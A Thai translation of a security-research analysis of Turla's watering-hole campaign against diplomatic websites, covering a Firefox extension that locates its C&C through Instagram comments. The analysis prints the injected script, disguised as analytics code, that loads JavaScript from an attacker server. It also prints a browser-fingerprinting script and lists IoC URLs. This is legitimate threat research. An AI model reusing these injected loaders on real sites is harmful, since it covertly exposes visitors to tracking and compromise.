Cybercrime

การโจมตีรูปแบบ APT: Turla’s watering hole มากับ Extension ของ Firefox

ตัวเสริมของ Firefox ที่ถูกใช้เป็นพลังงานขับเคลื่อนเซิร์ฟเวอร์ C&C ของแฮกเกอร์

Advanced Persistent Threat หรือ APT เป็นชื่อเรียกการโจมตีไซเบอร์ที่มีเป้าหมายเป็นหน่วยงานที่มีข้อมูลสำคัญ อย่างหน่วยงานของรัฐบาล หรือองค์กรที่มีขนาดใหญ่ ยกตัวอย่างเช่น แผนการ Turla’s watering hole ที่โจมตีรัฐบาล, หน่วยงานของรัฐบาล และนักการทูต เป็นปีๆ โดยใช้วิธีเปลี่ยนเส้นทางเหยื่อไปยังเซิร์ฟเวอร์ C&C ของพวกเขา

Watering Hole โจมตีเว็บไซต์ที่เป็นที่สนใจของเหยื่อ โดยเน้นเป็นเว็บไซต์ภายในอย่างเว็บไซต์ของสถานเอกอัครราชทูต และเมื่อเดือนกุมภาพันธุ์ที่ผ่านมาทาง Forcepoint ได้อัพเดตเว็บไซต์ที่ถูกเจาะระบบ

ดังนั้นทางเราจึงจับตาดูแผนการนี้อย่างใกล้ชิดยิ่งขึ้น และเตือนพวกเขาเกี่ยวกับภัยคุกคามที่กำลังจะกลับมาอีกในรอบหลายเดือน

ขั้นตอนแรกของการโจมตี

ในส่วน IoC ด้านล่างเป็นชื่อของเว็บไซต์ที่ถูกเปลี่ยนเส้นทางไปยังเซิร์ฟเวอร์ C&C ของ Turla watering hole ที่แฮกเกอร์ใช้ ซึ่งมีหลายเว็บไซต์ที่มีความเกี่ยวข้องกับเอกอัครราชทูตทั่วโลก

แฮกเกอร์ใช้ Snippet เพื่อเปลี่ยนเส้นทางเหยื่อไปยังเซิร์ฟเวอร์อันตราย ภาพด้านล่างเป็นตัวอย่างสคริปต์ที่แฮกเกอร์ใช้เมื่อไม่กี่เดือนที่ผ่านมา

<!– Clicky Web Analytics (start) –>

//

var clicky_site_ids = clicky_site_ids || [];

clicky_site_ids.push(100673048);

(function() {

var s = document.createElement(‘script’);

var a = ‘http://www.mentalhealthcheck.net/’;

var b = ‘update/counter.js’;

s.type = ‘text/javascript’; s.async = true;

s.src = ‘//static.getclicky.com/js’; s.src = a.concat(b);

( document.getElementsByTagName(‘head’)[0] || document.getElementsByTagName(‘body’)[0]).appendChild(s);

})();

// ]]>

แฮกเกอร์ใช้ตัวอย่างจากเว็บไซต์ Clicky เพื่อทำการทดสอบแบบ Real-Time และเราพบสคริปต์อีกตัวที่ชื่อว่า mentalhealthcheck.net/update/counter.js นี่เป็นเซิร์ฟเวอร์ที่ทีม Turla ใส่สคริปต์ชื่อว่า Fingerprinting ที่คอบเก็บข้อมูลเกี่ยวกับระบบที่ทำงานอยู่

ต่อมาจะกระจายสคริปต์ไปยังเป้าหมาย โดยเซิร์ฟเวอร์ C&C จะมีหน้าที่กรองโดยใช้ IP range ถ้าหากเป้าหมายอยู่ในระยะ พวกเขาจะได้รับ fingerprinting script ถ้าอยู่นอกระยะจะได้สคริปต์อีกแบบหนึ่ง ด้านล่างจะเป็นสคริปต์ตัวอย่างที่เป้าหมายในระยะ IP range ได้รับ

function cb_custom() {

loadScript(“http://www.mentalhealthcheck.net/script/pde.js”, cb_custom1);

}

function cb_custom1() {

PluginDetect.getVersion(‘.’);

myResults[‘Java’]=PluginDetect.getVersion(‘Java’);

myResults[‘Flash’]=PluginDetect.getVersion(‘Flash’);

myResults[‘Shockwave’]=PluginDetect.getVersion(‘Shockwave’);

myResults[‘AdobeReader’]=PluginDetect.getVersion(‘AdobeReader’) || PluginDetect.getVersion(‘PDFReader’);

var ec = new evercookie();

ec.get(‘thread’, getCookie)

JavaScript ตัวนี้จะดาวน์โหลด JS library ชื่อว่า PluginDetect ที่สามารถเก็บข้อมูล Plugin ที่ติดตั้งในเบราว์เซอร์ของผู้ใช้ได้ และส่งข้อมูลให้กับเซิร์ฟเวอร์ C&C

นอกจากนั้นยังติดตั้ง EverCookie หรือ Super Cookie ที่เก็บข้อมูลการเข้าชมเว็บไซต์ของผู้ใช้ทุกเว็บไซต์

Firefox Extension

ในขณะที่เราวิเคราะห์แผนการครั้งนี้ เราพบตัวอย่างที่คล้ายกับ Pacifier APT ที่ทาง BitDefender เคยรายงานเกี่ยวกับแผนการ Phishing ที่แพร่กระจายไฟล์เอกสาร Word อันตรายตามสถาบันต่างๆทั่วโลก ไฟล์ Word ตัวนี้จะปล่อยโปรแกรมฝังไว้ในเครื่อว

ในรายงานบอกว่าไฟล์เอกสาร Word ตัวนั้นกับใน Firefox Extension มีฟังก์ชันการทำงานเดียวกันกับที่อยู่ใน Pacifier ACT

extension_file-768x541.png

เรายังสังเกตเห็นอีกว่า Extension ตัวนี้แพร่กระจายผ่านเว็บไซต์องค์กรความปลอดภัยของชาวสวิส และผู้ใช้ที่ดาวน์โหลดไปก็เท่ากับเพิ่มโดเมน C&C

การทำงานใน Instagram

Extension ตัวนี้ใช้ลิงก์ย่อ bit.ly เพื่อเชื่อมต่อกับเซิร์ฟเวอร์ C&C และใช้เส้นทางผ่านคอมเม้นท์เฉพาะบนโพสต์ ล่าสุดใช้บนโพสต์ของ Britney Spears

britney_instagram_square-768x572

สรุป

จริงอยู่ที่ Turla ใช้ประโยชน์จากโซเชี่ยลมีเดียเพื่อเพิ่มเซิร์ฟเวอร์ C&C แต่พฤติกรรมแบบนี้เคยพบแล้วอย่าง Dukes ที่แฮกเกอร์ใข้โซเชี่ยลมีเดียเพื่อฟื้นฟูที่อยู่ของเซิร์ฟเวอร์ C&C เพื่อให้ยากต่อการป้องกัน ด้วยเหตุผลแรกคือ การแยกทราฟฟิคอันตรายออกจากทราฟฟิคนั้นยาก และสอง มันทำให้แฮกเกอร์สามารถเปลี่ยนที่อยู่ C&C ได้ง่ายและลบร่องรอยได้

IoCs

เว็บไซต์ที่เป็นเซิร์ฟเวอร์ของ fingerprinting ที่ถูกลบไปแล้ว

Screen Shot 2560-06-21 at 4.48.23 PM

เว็บไซต์ที่โดนเปลี่ยนเป็นส่วนหนึ่งของ Watering hole

  • hxxp://www.mentalhealthcheck.net/update/counter.js (hxxp://bitly.com/2hlv91v+)
  • hxxp://www.mentalhealthcheck.net/script/pde.js
  • hxxp://drivers.epsoncorp.com/plugin/analytics/counter.js
  • hxxp://rss.nbcpost.com/news/today/content.php
  • hxxp://static.travelclothes.org/main.js
  • hxxp://msgcollection.com/templates/nivoslider/loading.php
  • hxxp://versal.media/?atis=509
  • hxxp://www.ajepcoin.com/UserFiles/File/init.php (hxxp://bit.ly/2h8Lztj+)
  • hxxp://loveandlight.aws3.net/wp-includes/theme-compat/akismet.php
  • hxxp://alessandrosl.com/core/modules/mailer/mailer.php

Author: JEAN-IAN BOUTIN
Source:
https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/
Translated by: Worapon H.

%d bloggers like this: